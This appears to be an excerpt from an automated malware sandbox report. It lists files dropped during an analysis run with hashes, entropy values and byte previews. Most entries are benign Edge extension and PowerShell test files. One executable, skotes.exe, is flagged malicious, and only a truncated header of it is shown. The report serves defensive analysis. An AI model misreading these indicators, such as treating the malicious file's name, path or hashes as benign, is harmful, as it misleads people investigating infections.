Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj02sz34.m3l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5sexbob.yvf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp11ao5r.3nr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsKECBGCGCGI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3278336
Entropy (8bit):	6.678739299621272
Encrypted:	false
SSDEEP:	49152:Vy/iRjA6Y2rjUl0ly9hL/qapGabr99KnYmcdRW/So5x:Vy/Kcv2rIl0l0hkq+Y/vqx
MD5:	0A25084685B54B88100D89D2BF1FB4DE
SHA1:	5A67610F98D718816FC87DDB0C07BEC46E0FD272
SHA-256:	FEBBB41378C5839064C6449C9B827D5F86CD5D3D162798E30A365C50F217A1FD
SHA-512:	D9DD3E961B48EF0989D65D73B4726E15F5773D4075527A1FDC7E4A8A1BD94A0BB8317DFE039F15D0E97642E78D0388BFC19A25098D416A2E1856CE522DB5A2D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.....8.2...@.................................W...k.............................1.............................d.1..................................................... . ............................@....rsrc...............................@....idata ............................@...suzdiwdy.P+......L+.................@...otlnilqb......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ac38c1e0-c01c-460b-9f36-0aa67db5eeec.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\c4e9f115-5a81-4f4f-9c7b-999dbcd57015.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.401881249531701
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrF:8e2Fa116uCntc5toYX6M
MD5:	2C1A4E01670BC6C68B882539FD8CCF80
SHA1:	D98DDEA0A496296412821153B38E070D08C36BE4
SHA-256:	D0C06B1BFB35191FC35FDED6D483F593586B5862CAAC71BD6CF4690ADB4F37A1
SHA-512:	16A1C4EA42AAA8426E4FC53B85456010D8620961C52A5BFE1BB5D707E0DAEE3268D4EE959F32AE77DE154F14DDE49E558B5E5D4DF4A012F4C64FA8C4F0165703
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\e0377c4f-e601-41dd-a9f3-cd2f93362b29.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_1777161884\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7668_1777161884\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7668_1777161884\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7668_1777161884\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_1777161884\c4e9f115-5a81-4f4f-9c7b-999dbcd57015.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
